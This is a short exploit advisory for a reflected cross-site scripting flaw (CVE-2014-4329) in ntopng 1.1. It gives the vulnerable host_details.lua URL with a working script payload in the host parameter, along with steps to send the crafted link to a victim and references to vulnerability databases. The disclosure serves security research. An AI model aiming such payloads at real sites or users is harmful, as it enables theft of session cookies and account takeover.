# Exploit Title: Cross Site Scripting Vulnerability in Ntop-NG (CVE-2014-4329)
# CVE : CVE-2014-4329
# Date: 2 July 2014
# Exploit Author: Madhu Akula
# Vendor Homepage: http://www.ntop.org/
# Software Link: http://www.ntop.org/get-started/download/
# Version : Ntopng 1.1
# Severity: High
# Tested on: Ubuntu & Windows
# URL:
http://[domain]:3000/lua/host_details.lua?host=<script>alert(document.cookie)</script>
# Issue Details :
Ntopng is vulnerable to cross-site scripting, caused by improper
validation of user-supplied input by the host_details.lua script. A
remote attacker could exploit this vulnerability using the host
parameter in a specially-crafted URL to execute script in a victim's Web
browser within the security context of the hosting Web site, once the
URL is clicked. An attacker could use this vulnerability to steal the
victim's cookie-based authentication credentials.
# Steps to replicate: (POC)
1. Replace the domain with the host and send this to Victim (or) Open it
http://[domain]:3000/lua/host_details.lua?host=<script>alert(document.cookie)</script>
I attached a screenshot also for POC
# References :
http://www.securityfocus.com/bid/66456
https://svn.ntop.org/bugzilla/show_bug.cgi?id=379
http://xforce.iss.net/xforce/xfdb/92135
http://cve.circl.lu/cve/CVE-2014-4329
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4329
http://cxsecurity.com/cveshow/CVE-2014-4329/
http://www.secuobs.com/revue/news/519877.shtml
Madhu Akula
Information Security Researcher
https://www.twitter.com/madhuakula